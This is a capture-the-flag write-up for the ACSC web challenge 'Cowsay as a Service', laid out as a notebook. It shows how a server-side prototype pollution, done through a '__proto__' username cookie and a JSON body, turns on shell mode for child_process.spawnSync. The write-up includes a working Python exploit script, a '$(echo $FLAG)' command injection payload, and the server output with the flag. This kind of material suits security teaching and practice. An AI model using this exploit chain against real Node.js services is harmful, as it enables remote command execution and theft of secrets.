# Cowsay as a Service

> WEB | 370 | 33 Solves
> 
> Enjoy your cowsay life with our Cowsay as a Service!  
> You can spawn your private instance from https://cowsay-as-a-service.chal.acsc.asia/.  
>
> Notice: Please do not spawn too many instances since our server resource is limited.  
> You can check the source code and run it in your local machine before do that.  
> Each instances are alive only for 5 minutes.  
> But don't worry! You can spawn again even if your instance expired.  
> 
> https://cowsay-as-a-service.chal.acsc.asia/
> 
> Attachment: cowsay-as-a-service.tar.gz (md5 b1f19fe170867369eb5297d2b9d4cc29)

- We can run a local copy of the server, accessible at `localhost:3000`
```bash
$ tar -xvf ./challenge/cowsay-as-a-service.tar.gz
$ cd distfiles
$ npm install
$ FLAG=FAKEFLAG node ./src/index.js
```

- On interacting with the server, the web service allows:
  - Login with some username
  - Requesting a cowsay ascii art
  - Changing a "color" setting

- Inspect source code in `src/index.js`
- Username is read straight from cookies without sanitisation
```js
app.use(async (ctx, next) => {
  ctx.state.user = ctx.cookies.get('username');
  await next();
});
```
- Cowsay is called using `child_process.spawnSync`
```js
router.get('/cowsay', (ctx, next) => {
  // ...
  if (ctx.request.query.say) {
    const result = child_process.spawnSync('/usr/games/cowsay', [ctx.request.query.say], { timeout: 500 });
    cowsay = result.stdout.toString();
  }
  // ...
}
```
- And the "settings" is saved using a javascript object
  - The `:name` key is read from the URL without sanitisation
  - The `ctx.request.body.value` is also first processed with `bodyParser`, meaning a JSON request MIME will be read as JSON instead of as raw string
```js
router.post('/setting/:name', (ctx, next) => {
  if (!settings[ctx.state.user]) {
    settings[ctx.state.user] = {};
  }
  const setting = settings[ctx.state.user];
  setting[ctx.params.name] = ctx.request.body.value;
}
app.use(bodyParser());
```
- Because we control `ctx.state.user`, `:name` and `ctx.request.body.value`, we have write control over the settings object
- This is a potential server side prototype pollution vulnerability

- Read [`child_process.spawnSync` docs](https://nodejs.org/api/child_process.html#child_process_child_process_spawnsync_command_args_options)
- In the server code, an options object with `timeout` key is passed
- There is another option `shell` that if set will enable shell interpolation in the args sent
```
options <Object>:
shell <boolean> | <string> If true, runs command inside of a shell. Uses '/bin/sh' on Unix, and process.env.ComSpec on Windows. A different shell can be specified as a string. See Shell requirements and Default Windows shell. Default: false (no shell).
```
- Our goal now is to cause prototype pollution such that `shell` is set to `true`

In [1]:
import requests

url = "http://localhost:3000/"

# Helper query methods

def sanity():
  res = requests.get(url)
  assert(res.status_code == 200)

def cowsay(a, b, show=False):
  res = requests.get(url + 'cowsay',
    params={ 'say' : b },
    cookies={ 'username' : a }
  )
  if show:
    print(res.text[411:])

def settings(a, b, x):
  if isinstance(x, str):
    res = requests.post(url + 'setting/' + b,
      data={'value': x},
      cookies={ 'username' : a }
    )
  else:
    res = requests.post(url + 'setting/' + b,
      json={'value': x},
      cookies={ 'username' : a }
    )
  assert(res.status_code == 200)

In [2]:
sanity()
cowsay('a', 'b', show=True)

<h1>Cowsay as a Service</h1>

<details class="color-setting">
  <summary>Color Preferences</summary>
  <form action="/setting/color" method="POST">
    <input type="color" name="value" value="#000000">
    <input type="submit" value="Change Color">
  </form>
</details>

<form action="/cowsay" method="GET" class="form">
  <input type="text" name="say" placeholder="hello">
  <input type="submit" value="Say">
</form>

<pre style="color: #000000" class="cowsay">
 ___
< b >
 ---
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

</pre>



- With a username `__proto__`, setting `shell` and a JSON encoded POST body of `true`, we can cause the protoype pollution:
```js
settings["__proto__"] = {};
settings["__proto__"]["shell"] = true
```

In [3]:
settings('__proto__', 'shell', True)

- Now we try to cowsay with shell interpolation to print environment variables

In [4]:
cowsay('a', '$(echo $FLAG)', show=True)

<h1>Cowsay as a Service</h1>

<details class="color-setting">
  <summary>Color Preferences</summary>
  <form action="/setting/color" method="POST">
    <input type="color" name="value" value="#000000">
    <input type="submit" value="Change Color">
  </form>
</details>

<form action="/cowsay" method="GET" class="form">
  <input type="text" name="say" placeholder="hello">
  <input type="submit" value="Say">
</form>

<pre style="color: #000000" class="cowsay">
 __________
< FAKEFLAG >
 ----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

</pre>



- Repeat on live server!

In [5]:
url = "http://<redacted>:<redacted>@cowsay-nodes.chal.acsc.asia:62948/"
sanity()
cowsay('a', 'b')
settings('__proto__', 'shell', True)
res = cowsay('a', '$(echo $FLAG)', show=True)

<h1>Cowsay as a Service</h1>

<details class="color-setting">
  <summary>Color Preferences</summary>
  <form action="/setting/color" method="POST">
    <input type="color" name="value" value="#000000">
    <input type="submit" value="Change Color">
  </form>
</details>

<form action="/cowsay" method="GET" class="form">
  <input type="text" name="say" placeholder="hello">
  <input type="submit" value="Say">
</form>

<pre style="color: #000000" class="cowsay">
 __________________________________
< ACSC{(oo)<Moooooooo_B09DRWWCSX!} >
 ----------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

</pre>



Flag: `ACSC{(oo)<Moooooooo_B09DRWWCSX!}`